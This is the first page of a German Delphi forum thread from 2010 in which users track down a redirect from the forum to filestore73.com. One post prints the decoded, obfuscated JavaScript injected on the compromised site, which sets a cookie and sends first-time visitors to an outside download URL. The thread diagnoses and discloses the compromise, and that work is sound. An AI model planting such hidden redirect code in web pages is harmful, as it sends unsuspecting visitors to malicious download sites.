AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren

Fehler in der DP? (FileStore73.com)

Ein Thema von Linor · begonnen am 4. Aug 2010 · letzter Beitrag vom 20. Jan 2011
Antwort Antwort
Seite 1 von 3  1 23   
Benutzerbild von Linor
Linor

Registriert seit: 19. Mai 2008
Ort: Holzwickede
60 Beiträge
 
Delphi 2010 Professional
 
#1

Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 14:57
Hi Zusammen,

ich habe manchmal das Problem, wenn ich über Google ein Thema anspringe werde ich auf FileStore73.com redirected.

Ich kann das nachvollziehen:
Mozilla im privaten Modus starten
Google -> Suchbegriff = TDragFilesTrg
Dritter Eintrag von oben (www.delphipraxis.net/620101-post.html) und schwupp bin ich oben genannter WebSeite!

Beim zweiten mal klappt es dann, daher auch den privaten Modus, wegen der Cookies...

Kann das noch jemand nachvollziehen?

Gruß, Kai
  Mit Zitat antworten Zitat
ATSV

Registriert seit: 8. Aug 2008
95 Beiträge
 
Delphi 7 Professional
 
#2

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:00
Hallo,
im Opera 10.60 habe ich das selbe verhalten.
Allerdings nur wenn ich von Google aus draufgehe über den Link hier gehts
  Mit Zitat antworten Zitat
Benutzerbild von ChrisE
ChrisE

Registriert seit: 15. Feb 2006
Ort: Hechingen
504 Beiträge
 
Delphi 10.2 Tokyo Professional
 
#3

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:03
Hallo,

ich surfe normal auch mit dem Fuchs und hab das jetzt einfach mal im Internet-Explorer ausprobiert (dort gibt es sicher keine Einträge der Delphipraxis im Cache / Cookies etc.)

Mit dem kann ich es ebenso nachvollziehen.

Gruß, Chris
Christian E.
Es gibt 10 Arten von Menschen, die die Binär lesen können und die die es nicht können

Delphi programming rules
  Mit Zitat antworten Zitat
Benutzerbild von himitsu
himitsu

Registriert seit: 11. Okt 2003
Ort: Elbflorenz
43.100 Beiträge
 
Delphi 12 Athens
 
#4

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:10
Auch im FF konnte ich es nachvollziehen, aber nur beim ersten Click von Google aus, danach ging es dann.

Eventuell bekommt irgendwo etwas davon mit, daß es diesen Link eigetnlich nicht mehr gibt und macht dann Werbung für eine Webseite.
(oder das Umleitungsplugin vom Daniel dreht etwas durch)
Garbage Collector ... Delphianer erzeugen keinen Müll, also brauchen sie auch keinen Müllsucher.
my Delphi wish list : BugReports/FeatureRequests
  Mit Zitat antworten Zitat
Namenloser

Registriert seit: 7. Jun 2006
Ort: Karlsruhe
3.724 Beiträge
 
FreePascal / Lazarus
 
#5

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:14
Also ich kann den Fehler nicht nachvollziehen.
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#6

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:22
*räusper* Oh oh ... o.O

Wenn man die DP über Google das erste Mal (keine Cookies) öffnet, dann erhält man folgende Antwort von DP-Server: klick me. Ich habe mir das noch nicht genauer angeschaut, aber so auf den ersten Blick sieht das nicht gut aus, oder?

Edit #1: Dieser Code ist nach erster Erkenntnis mit Sicherheit für die Weiterleitung verantwortlich.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog

Geändert von Valle ( 4. Aug 2010 um 15:26 Uhr)
  Mit Zitat antworten Zitat
Benutzerbild von leddl
leddl

Registriert seit: 13. Okt 2003
Ort: Künzelsau
1.613 Beiträge
 
Delphi 2006 Professional
 
#7

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:26
Das lässt sich selbst mit dem IE6 nachvollziehen
Axel Sefranek
A programmer started to cuss, cause getting to sleep was a fuss.
As he lay there in bed, looping round in his head
was: while(!asleep()) ++sheep;
  Mit Zitat antworten Zitat
Benutzerbild von Bernhard Geyer
Bernhard Geyer

Registriert seit: 13. Aug 2002
17.169 Beiträge
 
Delphi 10.4 Sydney
 
#8

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:29
*räusper* Oh oh ... o.O

Wenn man die DP über Google das erste Mal (keine Cookies) öffnet, dann erhält man folgende Antwort von DP-Server: klick me. Ich habe mir das noch nicht genauer angeschaut, aber so auf den ersten Blick sieht das nicht gut aus, oder?
Schaut danach aus als hätte sich die DP etwas eingefangen. Ich denke da sollte man den Doktor mit Antibiotika ranlassen ...
Windows Vista - Eine neue Erfahrung in Fehlern.
  Mit Zitat antworten Zitat
mkinzler
(Moderator)

Registriert seit: 9. Dez 2005
Ort: Heilbronn
39.851 Beiträge
 
Delphi 11 Alexandria
 
#9

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:33
Also bei mir kommt die gewünschte Seite
Es liegt wohl eher an Google
Markus Kinzler
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#10

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:35
@mkinzler: Es liegt nicht an Google. Sicher nicht. Hast du NoScript?

Also wenn man das Javascript mal dekodiert - was ich mal getan habe - dann erhält man folgendes:

HTML-Code:
   var _0x7a86 = ["getTime", "setTime", "; expires=", "toGMTString", "cookie", "=", "; path=/", "vbsp", "1", "location", "http://filestore73.com/download.php?id="];
   function ipbcc(_0xf1d9x2, _0xf1d9x3)
   {
      var _0xf1d9x4 = new Date;
      _0xf1d9x4[_0x7a86[1]](_0xf1d9x4[_0x7a86[0]]() + 86400000);
      var _0xf1d9x5 = _0x7a86[2] + _0xf1d9x4[_0x7a86[3]]();
      document[_0x7a86[4]] = _0xf1d9x2 + _0x7a86[5] + _0xf1d9x3 + _0xf1d9x5 + _0x7a86[6];
   }
   ipbcc(_0x7a86[7], _0x7a86[8]);
   document[_0x7a86[9]] = _0x7a86[10] + vbsp;
Edit: Okay, noch kurzes Kommentar dazu: Der Code ist eigentlich ganz einfach. Wenn man die Variablen einfach mal umbennen würde, dann wäre er sicher auch lesbarer. Er ändert einfach die URL auf diese mysteriöse Filesharing Seite. Der Code (der den Download angeben sollte?) wird dabei scheinbar vom Server dynamisch neu generiert. Jemand sollte bei Daniel Panik schieben.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog

Geändert von Valle ( 4. Aug 2010 um 15:38 Uhr)
  Mit Zitat antworten Zitat
Antwort Antwort
Seite 1 von 3  1 23   

Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht

Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 19:11 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz